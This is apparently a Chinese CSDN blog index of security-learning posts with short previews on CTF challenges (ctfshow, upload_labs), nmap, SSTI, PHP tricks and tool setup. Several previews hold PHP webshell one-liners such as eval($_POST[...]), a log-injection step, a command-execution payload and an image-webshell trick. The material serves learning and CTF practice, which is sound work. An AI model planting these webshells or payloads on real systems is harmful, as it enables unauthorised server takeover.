![](https://img-blog.csdnimg.cn/20201014180756738.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
安全学习
文章平均质量分 56
multi4
这个作者很懒,什么都没留下…
展开
-
nmap简单使用
文章目录常见端口扫描存活主机端口扫描扫描半开放扫描扫描udp端口Nmap的操作系统指纹识别技术:常见端口端口扫描工具,即借助工具,试图了解所扫描IP提供的计算机网络服务类型(网络服务均与端口号相关),从而发现攻击弱点,常见服务对应端口号:服务端口号HTTP80HTTPS443Telnet23FTP21SSH(安全登录)、SCP(文件传输)、端口重定向 22SMTP25POP3110WebLogic7001TOMCAT原创 2021-02-09 22:32:30 · 153 阅读 · 0 评论 -
ctfshow_信息收集
文章目录WEB1WEB2WEB3WEB4WEB5WEB6WEB7WEB8WEB9WEB10WEB11WEB12WEB13web14WEB15WEB16_探针WEB17_IPWEB18_查看js代码WEB19_前台js绕过WEB20WEB1F12查看源代码WEB2禁用javascriptWEB3用burp抓包WEB4访问robots.txtWEB5phps文件泄露,访问index.phpsWEB6www.zip文件泄露,访问得flagWEB7.git泄露,访问.gitWEB8.原创 2021-02-07 17:28:45 · 529 阅读 · 0 评论 -
ctfshow_文件上传
文章目录web151WEB152WEB153WEB154WEB155web151禁用jsWEB152burp改包WEB153这里利用.user.ini.先写好一个.user.ini内容如下:在写一个shell.png通过burp上传访问upload页面即可,接下来用蚂蚁剑连接。WEB154这里考的是短标签和上面一样,只是把图片里面的内容改成短标签风格即可<?=eval($_POST[1]);?>WEB155和上题一样...原创 2021-02-04 22:11:33 · 491 阅读 · 0 评论 -
ctfshow命令执行
文章目录WEB29做题前先看看命令执行小技巧命令执行绕过总结WEB29error_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}方法一:模糊搜索payload:?c=system(‘cat f*’);解法二:了原创 2021-02-06 15:42:58 · 1186 阅读 · 0 评论 -
day5-escapeshellarg与escapeshellcmd使用不当
文章目录Day 5 - postcardescapeshellcmd()函数escapeshellarg()函数小案列总结:Day 5 - postcardescapeshellcmd()函数escapeshellarg()函数escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数小案列可见两个函数配合使用就会导致多个参数的注入。1、传入的参数是:172.17.0.2’ -v -d a=12、经过escapeshellarg处理后变成了’172.17.原创 2021-01-09 14:47:35 · 2299 阅读 · 0 评论 -
python SSTI tornado render模板注入
原理tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。简单的理解例子如下:import tornado.ioloopimport tornado.web class MainHandler(tornado.web.RequestHandler): def get(self): self.render(原创 2020-12-17 19:17:52 · 2399 阅读 · 0 评论 -
ida
常用命令F5反编译ctrl+x引用字符串shift+f12查找可打印字符串选中+c把选中内容转换代码d转换数据选中按p创建函数alt + k修改栈指针原创 2021-02-04 22:52:06 · 103 阅读 · 0 评论 -
web
文章目录web 4日志注入web 4日志注入查看日志?url=/var/log/nginx/access.log进行日志注入<?php @eval($_POST['a']);?>蚂蚁剑连接原创 2021-02-04 22:51:39 · 52 阅读 · 0 评论 -
记一次waf笔记
Waf从入门到Bypass原创 2021-02-04 22:51:05 · 105 阅读 · 0 评论 -
Base64隐写脚本
python隐写脚本import base64b64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'with open('stego.txt', 'rb') as f: flag = '' bin_str = '' for line in f.readlines(): stegb64 = str(line, "utf-8").strip("\n")原创 2020-12-10 08:48:03 · 1238 阅读 · 0 评论 -
volatility使用
1、查看基本信息,根据查到的信息确定profile的值volatility -f 文件.vmem imageinfo2、指定profile,使用具体的命令iehistory 是看浏览器的进程,pslist是ps命令(也可以用psscan),等等volatility -f BOOM-6452e9b9.vmem --profile=Win7SP1x64 iehistory ...原创 2020-12-09 17:51:16 · 2294 阅读 · 0 评论 -
php伪协议详细总结
php伪协议实现命令执行的七种姿势PHP伪协议总结原创 2020-12-05 21:31:25 · 1554 阅读 · 0 评论 -
Django,结合PHP命令执行
URL编码对照表当输入边界值%80时系统产生报错知识点:宽字节注入原创 2020-12-05 21:15:51 · 284 阅读 · 0 评论 -
从一道题看数组的key溢出问题
<?php//php5.5.9$stuff = $_POST["stuff"];$array = ['admin', 'user'];if($stuff === $array && $stuff[0] != 'admin') { //个判断,既要数组强等于,又要首元素不等 $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ // i不区分大小写 // m使边.原创 2020-12-05 14:17:58 · 1214 阅读 · 1 评论 -
flask模板注入
flask基础ssti:SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念,通过与服务端模板的 输入输出 交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的因为flask使用Jinja2渲染引擎,可以在前端通过{{}}的形式使用变量或者{% %}执行python语句,存在注入的可能(不懂的话先去看flask!)因为flask是用的python语言,所以python中的一些内置函数可以在flask中被原创 2021-02-04 22:49:15 · 2843 阅读 · 1 评论 -
web渗透信息收集技巧方法汇集
1.Google Hacking:相关教程利用搜索引擎的原理进行特殊语句查询。2.Shodan使用:相关教程搜索互联网链接设备(摄像头、路由器、服务器)3.站长之家:网站地址搜索网站信息,模拟蜘蛛访问对网站内部链接进行检测4.钟馗之眼的使用:相关教程搜索互联网空间中的设备、网站及其使用的服务或组件等信息5.Robtex:网站地址DNS查询专用6.Searchdns:网站地址ip地址信息查询7.WWWSCAN(轻量化软件):下载地址网站后台扫描工具...原创 2020-12-01 23:24:34 · 381 阅读 · 1 评论 -
文件上传图片马绕过
图片马制作先准备一个一个shell.php的文件,还有一张图片。copy 3.jpg/b + shell.php/a 10.jpg## 二次渲染原创 2021-02-04 22:47:35 · 71 阅读 · 0 评论 -
红日安全代码审计Day2 - filter_var函数缺陷详解
这里写目录标题Day2题解filter_var($url, FILTER_VALIDATE_URL)parse_urlpreg_matchimplodeDay2题解<?php $url = $_GET['url'];// 获取一个url// isset() 函数用于检测变量是否已设置并且非 NULL。if(isset($url) && filter_var($url, FILTER_VALIDATE_URL)){ // FILTER_VALIDATE_URL :把原创 2020-11-30 00:14:45 · 478 阅读 · 2 评论 -
红日安全代码审计Day1 - in_array函数缺陷
这里写目录标题Day1题解in_array函数漏洞MySQL make_set()的用法Day1题解题目如下:这里可以先参考一下这篇文章:MySQLi基于面向对象的编程<?php//index.phpinclude 'config.php';// 包含文件config.php$conn = new mysqli($servername, $username, $password, $dbname);//连接数据库账号密码(MySQLi基于面向对象的编程)if ($conn->原创 2020-11-28 23:40:09 · 428 阅读 · 0 评论 -
MySQLi基于面向对象的编程
mysqli在windows上,对于PHP 5.3或更新版本,mysqli扩展默认开启,对于PHP 5.0 5.1 5.2,mysqli扩展默认并不会开启,因此php.ini中php_mysqli.dll这个DLL 必须开启。MySQLi基于面向过程的编程和面向对象的编程是相对的,其中使用到的方法都是可以类比的。连接数据库header("Content-type:text/html;charset=utf-8");$mysqli = new mysqli("localhost", "root",.转载 2020-11-28 23:08:24 · 269 阅读 · 0 评论 -
MySQLi基于面向过程的编程
mysqli在windows上,对于PHP 5.3或更新版本,mysqli扩展默认开启,对于PHP 5.0 5.1 5.2,mysqli扩展默认并不会开启,因此php.ini中php_mysqli.dll这个DLL 必须开启。MySQLi基于面向过程的编程和面向对象的编程是相对的,其中使用到的方法都是可以类比的。连接数据库header("Content-type:text/html;charset=utf-8");$link = mysqli_connect( 'localhost' , .转载 2020-11-28 22:38:25 · 112 阅读 · 0 评论 -
ZIP文件组成
压缩源文件数据区+压缩源文件目录区+压缩源文件目录结束标志1、压缩源文件数据区在这个数据区中每一个压缩的源文件/目录都是一条记录,记录的格式如下: [文件头+ 文件数据 + 数据描述符] a、文件头结构 组成 长度 文件头标记 4 bytes (0x04034b50) 解压文件所需 pkware 版本 2 bytes 全局方式位标记 2 b...原创 2020-11-15 21:00:12 · 423 阅读 · 0 评论 -
攻防世界crypto进阶区
crypto告诉你个秘密告诉你个秘密把文件下载下来,里面的内容是636A56355279427363446C4A49454A7154534230526D684356445A31614342354E326C4B4946467A5769426961453067最大不超过F,猜测十六进制,将其转成字符串cjV5RyBscDlJIEJqTSB0RmhCVDZ1aCB5N2lKIFFzWiBiaE0g...原创 2020-11-10 19:24:51 · 236 阅读 · 0 评论 -
攻防世界misc
文章目录这里我们把下载下来的文件用linux查看一下是什么文件,这里发现是系统文件我们创建一个文件夹,这里来放等下挂载的文件mkdir /tmp/forensic这里直接挂载mount -o loop forensic100 /tmp/forensic接下来我们进入目录,这里是挂载完成的目录我们根据题目提示,key.txt然后直接用grep管道命令直接查。这里发现在1目录下,这里查看1的文件格式,发现是gzip这里我们修改一下后缀名,发现未知格式这里我们把1.gzip改回原原创 2020-11-07 16:36:20 · 446 阅读 · 0 评论 -
工控ctf
文章目录黑客的大意黑客的大意下载后得到mail,在文件后面jpg打开图片是一个这样的图片,这里我们根据题目的意思:黑客在入侵后不小心留下了这样一个文件,请分析文件进行溯源,找到黑客的邮箱。flag格式为flag{邮箱账号}这里的主要关键词是对文件进行溯源,以及flag格式为邮箱账号然后我们看文件有什么特征,然后发现下面有一句英文...原创 2020-10-29 19:38:53 · 7683 阅读 · 1 评论 -
upload_labs闯关
第一关这里第一关提示然后我们可以创建一个文本文件写入一句话木马,然后把里面内容写成是一句话木马,再把文件名修改一下。<?php eval($_POST['a']); ?>然后上传文件,用burp修改一下后缀名为php,上传过去用蚂蚁剑连接一下就可以了。第二关...原创 2020-10-29 17:00:22 · 215 阅读 · 0 评论 -
[极客大挑战 2019]PHP unserialize
这里我用的是buuctf里面的[极客大挑战 2019]PHP 1。这里我们看到题目,然后发现提示,他说有网站备份,我们知道备份文件一般是bak格式的,这里我用xshell连接kali,然后用kali去扫描网站目录。这里dirsearch在kali不是自带的,要自己去下一条命令就可以下载好,然后自己学一下如何扫描,很简单。进入目录之后输入网址这里发现有非常多的目录但是发现这个颜色不一样,事出反常必有妖,所以访问看看。这里发现需要下载文件,然后我们把文件下载一下,看一下。这里我们解压一下发现这里应原创 2020-10-26 00:43:32 · 648 阅读 · 0 评论 -
zip伪加密原理
实例压缩源文件数据区:50 4B 03 04:这是头文件标记(0x04034b50)14 00:解压文件所需 pkware 版本09 00:全局方式位标记(有无加密) 头文件标记后2bytes08 00:压缩方式50 A3:最后修改文件时间A5 4A:最后修改文件日期21 38 76 65:CRC-32校验(1480B516)19 00 00 00:压缩后尺寸(25)17 00 00 00:未压缩尺寸(23)08 00:文件名长度00 00:扩展记录长度66 6C 61 67 2原创 2020-11-15 21:30:26 · 401 阅读 · 1 评论 -
dockerc-compose搭建XSS靶场
这里我用的是这个地址https://www.runoob.com/docker/docker-compose.html在这里插入图片描述原创 2020-10-15 17:39:38 · 225 阅读 · 0 评论 -
docker搭建网站详细
远程连接centos7这里我用的是xshell连接centos7下载docker这里我用的是阿里的Docker CE 镜像源站这里我用的是centos7搭建的,如果是ubuntu的可以进上面那个网站上看step 1: 安装必要的一些系统工具sudo yum install -y yum-utils device-mapper-persistent-data lvm2Step 2: 添加软件源信息sudo yum-config-manager --add-repo http://mirro原创 2020-10-15 00:20:41 · 7372 阅读 · 0 评论 -
简单sql注入超详细原理
一、手工注入我们这边搭建的环境是sqli-labs-master。链接:https://github.com/Audi-1/sqli-labs安装:首先安装phpstudy或者xampp将下载的文件解压发在:phpstudy的WWW文件夹里 或者 xampp里面的htdocs文件夹里面修改mysql文件的账号密码在sqli-labs-master\sql-connections里面有个db-creds.inc文件,打开并修改账号密码。点击第一个:Setup/reset Database原创 2020-10-01 22:49:09 · 2707 阅读 · 0 评论 -
蚁剑安装以及使用方法
一、蚁剑如何安装蚁剑安装分两个步骤一个是下载源代码,还有一个加载器,用加载器去加载源代码,下载的的文件路径一定要记得蚁剑源码下载:https://github.com/AntSwordProject/antSword蚁剑加载器下载:https://github.com/AntSwordProject/AntSword-Loader下载之后解压缩之后是这样的点击AntSword-Loader-v4.0.3-win32-x64这个文件打开AntSword.exe点击初始化点击初始化点击选原创 2020-09-14 22:18:10 · 27390 阅读 · 12 评论